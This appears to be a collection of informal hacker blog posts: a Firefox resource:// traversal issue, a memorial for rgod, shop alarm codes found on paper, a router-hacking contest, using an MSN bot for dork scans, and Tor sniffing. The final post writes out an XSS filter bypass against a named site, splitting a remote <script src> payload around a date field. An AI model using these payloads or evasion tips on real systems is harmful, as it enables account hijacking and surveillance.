I am guna keep this post short
understand that was related to firefox 2, we now are on firefox 3 an yet resource:///%2e%2e …. you understand ? carrying over the old problems?
Wonder what else has carryed over?
Well thats all.
Yes things are going slow yet again as I have alot going off in my real life. Soon as I have the time I will try posting something worth reading.
I have just found out today rgod is no longer with us, as he passed away a few days ago. rgod did some amazing things in his time that made me open my eyes, an was one of the best contributes to the hacker community. This is a short post as I am pretty lost for words at the fact some one with so much talent has gone.
The Hacker Webzine is offering to raise a glass for him an I will join him in that. I ask for the people who knew him or of him then remember him an don’t let that memory pass.
Rest in piece rgod
Well I am kinda back on the net now. So time for a post I would say.
I was out shopping for some new hardware a few days ago, I needed a new wireless card that would work for packet injection. So I went to a few of the big name shops that deal with computer goods (needless to say I didn’t find what I was looking for as they all where the wrong chip set or price).
Anyway back to the point of this post, most of the big named shops use the same type of locks and security devices bought from the same company’s. They tent to be secure an work pretty well when accompanied with staff awareness.
Well seems that a staff member was not enforcing this very well as I found let next to the keypad for disarming the alarms a little scarp of paper. What was on this scarp of paper may you ask? It had the codes for the electronic keypads that where hooked up to such items as laptops, cameras an over high end priced goods oops. The was another code for the laptop cable locks as well.
Turns out the scrap of paper was no old either was it was written on the back of what seemed to be a staffs Stock level report for that day. Tut tut indeed.
Here is a pic of said scrap of paper code paper
So I am in the process of moving an will be with out net for a while so there will bet yet an even longer time span on no posts. meh What can be done eh.
http://sla.ckers.org/forum/read.php?13,20128
http://www.0×000000.com/?i=508
http://www.gnucitizen.org/projects/router-hacking-challenge
The new red is hacking your home router. An everyone is invited. People are being invited to join in the masses in attempting to hack there home router as a set challenge an also a learning excise really. Find out something new are practise your skills in bug finding. The best entry will be crowned the winner
Rules: pretty much every goes, buffer overflows to CSRF issues that plague many routers.
You can submit your entries to: hackerwebzine[at]gmail[dot]com.
or
Post them here: http://sla.ckers.org/forum/read.php?13,20128
or
Post them here: http://www.gnucitizen.org/projects/router-hacking-challenge
OR!!!
Even leave them in a comment here an I will update the sla.ckers post with your entry.
So good look boys an girls let the best man/woman win
Nothing really big, just something I though I would throw up. So MSN seem to be creating some form of chat bot to be your friend on MSN live, now when messing about with the bot I found they can carry out search requests for you meaning they can carry out dork scans with out you hinting the site your self. They do have there limitations such as it seems to only bring back 10 results an if the account was not created with a proxy an used with a proxy at all times they will know who you are once legal action is taken and MSN look through there logs.
Anyway that was just a random post. Maybe I will have something more interesting to post about next time, I hope so anyway.
Nothing really to say but though I would make a post, I saw yet another post of about tor being abused yet again. This is not nothing new after all there where this , this and this. These wont be the only things out there, I just got bored of typing that’s all.
I just wonder if ether are any tor farms out there, we know we can sniff the tor traffic, also make the tor server lie about its bandwidth making it selected more by tor clients. So there very well could be a farm of tor servers just sat sniffing traffic.
What do you think?
Ok so I am getting little time to make intresting blogs so blogs or now just guna be if an when I can make them simple, thats all fokes.
target site:yousuckirule.com
well another networking site falls victim to XSS the site seems to have some filters in place that do not try an changing user input but instead just redirects you to a page with a static message on screen stating JavaScript can’t be used. So far so good. This happens on a lot of the fields where input can be placed by the user when posting comments on peoples profiles.
When you post a comment I have noticed that the date is html encoded an when posted on the page becomes unencoded. Would this be the vector I wanted? We try placing script tags in along side the date when its posted (encoded and unencoded) but both times we are redirected to the no JavaScript page, hmmm well don’t give up there.
Lets try another way instead of <script>alert(1);</scrip>, so this time I gave <script src=http://lab.v-wall.co.uk/i.js></script> a try .. still the same out come. Don’t give up there instead of placing it all together place the first half <script src=http://lab.v-wall.co.uk/i.js> in front of the year (in our date that is being posted) and the ending </script> tags after the date. This seems to bypass what ever filter they have in place.
So there you have it another networking site that could be used for another XSS worm who knows.
There would have been a Poc to go with this post but there is too much going off in RL to get the Poc woking to a good stage oh well anyone does make one leav a comment be intresting to see.